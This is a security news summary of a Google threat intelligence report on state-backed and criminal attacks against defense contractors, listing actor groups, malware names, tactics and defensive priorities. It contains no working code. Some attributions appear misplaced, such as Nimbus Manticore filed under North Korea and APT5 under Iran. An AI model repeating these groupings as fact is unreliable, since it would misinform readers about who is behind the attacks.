The defense industrial base (DIB), companies that design, build, and support military systems , remains one of the most intensely targeted sectors in global cyber operations. A recent report by Google Threat Intelligence Group (GTIG) details the coordinated attacks against defense industrial base (DIB) enterprises and organizations by multiple groups, including state backed actors from China, Iran, North Korea and Russia; others claiming they are hacktivists; while others are financially motivated cyber criminals; all of which are pursuing DIB enterprises and organizations for various reasons using similar methods but differing in those reasons.
Google believes that the current increase in attacks can be attributed to 4 major trends within those attacks:
1. Direct battlefield relevance of the entities being targeted; many of those groups are specifically targeting the defense contractors providing the technology to assist in the Russia-Ukraine conflict; they are especially targeting contractors that are providing unmanned ground vehicles (UGVs), unmanned aerial vehicles (UAVs) or similar technology.
2. Human targeting and recruitment of insiders for authentication purposes; North Korean and Iranian organizations routinely seek to exploit individuals by directly contacting them (generally through a fictitious employment opportunity) and through hiring processes to compromise individuals’ credentials and deliver a malware payload to an employee.
3. Exploiting edge devices; Organizations linked to China are utilizing network appliances, virtualization platforms and other devices on the perimeter of a network as a way of entering without being detected (entry point).
4. Manufacturing supply chain breach; If your defense contractor depends upon an upstream manufacturer for parts/services and they have been breached, then the breach has downstream impact.
The report shows an increasing trend towards stealth on behalf of attackers; by limiting their targeting to individual systems, using living-off-the-land tactics and/or utilizing compromised legitimate infrastructure, they are less likely to trigger alert (<50%).
Notable actors and tactics used by those actors.
1. Russia-aligned
a. APT44 (Sandworm) — Physically accesses devices in Ukraine to extract Signal/Telegram data using tools like WAVESIGN (decrypts Signal desktop app).
b. UNC5125 (FlyingYeti / UAC-0149) — Targets frontline drone operators with Google Forms reconnaissance and messaging-delivered malware (MESSYFORK / COOKBOX); also deploys Android trojan GREYBATTLE via fake Ukrainian military AI company sites.
c. UNC5792 & UNC4221 — Hijack Signal accounts via device linking, deliver TINYWHALE downloader + MeshAgent, use STALECOOKIE (mimics DELTA battlefield system) to steal cookies.
d. UNC5976 & UNC6096 — Phishing with fake RDP files and WhatsApp-delivered LNKs; Android malware GALLGRAB grabs battlefield app data.
2. China-aligned
a. UNC3236 (Volt Typhoon) — Scans public login portals of North American defense contractors; uses ARCMAZE obfuscation to hide origin.
b. The UNC6508 Group can exploit the upgrade process of the REDCap software through an INFINITERED backdoor to gain continuous access and steal user credentials.
c. There have been many reports that users of ORB networks have used their residential or commercial devices to route their reconnaissance traffic through these devices to avoid being geofenced by their respective jurisdictions and avoid attribution of their reconnaissance activities.
3. North Korea-aligned
a. UNC2970 (Lazarus) — Operation Dream Job lures aerospace/defense workers with fake jobs; increasingly uses AI for target reconnaissance.
b. UNC1549 (Nimbus Manticore) — Targets Middle East aerospace/defense with MINIBIKE, TWOSTROKE, DEEPROOT, CRASHPAD; also runs Dream Job-style ops.
4. Iran-aligned
a. UNC6446 — Distributes custom malware via fake resume builders and personality tests aimed at U.S. and Middle East aerospace/defense personnel.
b. APT5 (Keyhole Panda / Mulberry Typhoon) — Tailored phishing against current/former employees of major contractors.
5. South Korea-focused
a. APT45 (Andariel) — SmallTiger malware hits South Korean defense, semiconductor, and automotive manufacturing.
b. APT43 (Kimsuky) — THINWAVE backdoor delivered via fake German/U.S. defense infrastructure.
Financially motivated criminals also routinely extort DIB firms and their manufacturing suppliers, treating them like any other high-value vertical.
The defense industrial base faces a persistent, multi-vector siege. Nation-state espionage (especially regarding battlefield technology and drones in Ukraine), insider recruitment operations, edge device exploitation, and compromised manufacturing supply chains have created a uniquely difficult threat environment. According to a Google report, while unique hazards differ by geography and sub-sector, continual pressure is expected to increase as new technologies such as autonomous systems and AI-assisted war become more prevalent in modern warfare.
DIB organizations should consider prioritizing:
1. The strengthening of edge devices and virtualization platforms
2. The careful vetting and monitoring of third-party manufacturing partners
3. Strong methods of control related to employee outreach activities, particularly unsolicited job offers
4. Behavioral detection for evasion-heavy tactics
5. Rapid patching and segmentation of battlefield-relevant R&D environments
Source: The Hacker News
February 14, 2026
February 14, 2026
February 14, 2026
August 24, 2024
January 02, 2026
February 03, 2025
© 2016 - 2026 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067
